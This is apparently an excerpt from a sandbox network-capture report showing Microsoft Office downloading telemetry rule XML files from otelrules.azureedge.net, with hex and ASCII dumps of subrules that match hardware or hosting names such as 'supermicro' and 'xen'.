2024-11-07 03:13:10 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:10 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:10 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031310Z-16547b76f7f7scqbhC1DFW0m5w000000079g00000000rpq3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:12 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:11 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:11 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: a4b2601f-a01e-006f-5d5f-2e13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031311Z-15869dbbcc6lq45jhC1DFWbkc8000000014000000000grh9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:11 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:11 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:11 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 7ec302fb-401e-0067-4b00-2f09c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031311Z-17df447cdb54ntx4hC1DFW2k4000000003ug000000006ef8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:11 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:11 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 1b068de9-201e-0085-515f-2e34e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031311Z-17df447cdb5l865xhC1DFW9n7g00000000t0000000008fz0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:11 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49839	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:11 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:11 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:11 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 72e3f643-801e-007b-5dd2-2ce7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031311Z-16547b76f7fp46ndhC1DFW66zg00000007pg000000004g1e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:11 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:12 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:12 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:12 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031312Z-16547b76f7fcrtpchC1DFW52e800000007gg00000000n4vh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:12 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:12 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:12 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 80f77114-701e-0098-765c-2e395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031312Z-17df447cdb54qlp6hC1DFWqcfc00000003rg00000000a0yr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:12 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:12 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:12 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 03c1180a-901e-007b-2b6d-2eac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031312Z-15869dbbcc662ldwhC1DFWbd5g000000011g00000000958c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:12 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:12 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:12 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 9446d350-201e-0051-238e-307340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031312Z-17df447cdb54ntx4hC1DFW2k4000000003rg00000000ep2e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:12 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-16547b76f7fknvdnhC1DFWxnys00000007h000000000m58k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:13 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:13 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 67318102-f01e-005d-7706-2f13ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-17df447cdb5l865xhC1DFW9n7g00000000tg000000006v62 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:13 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
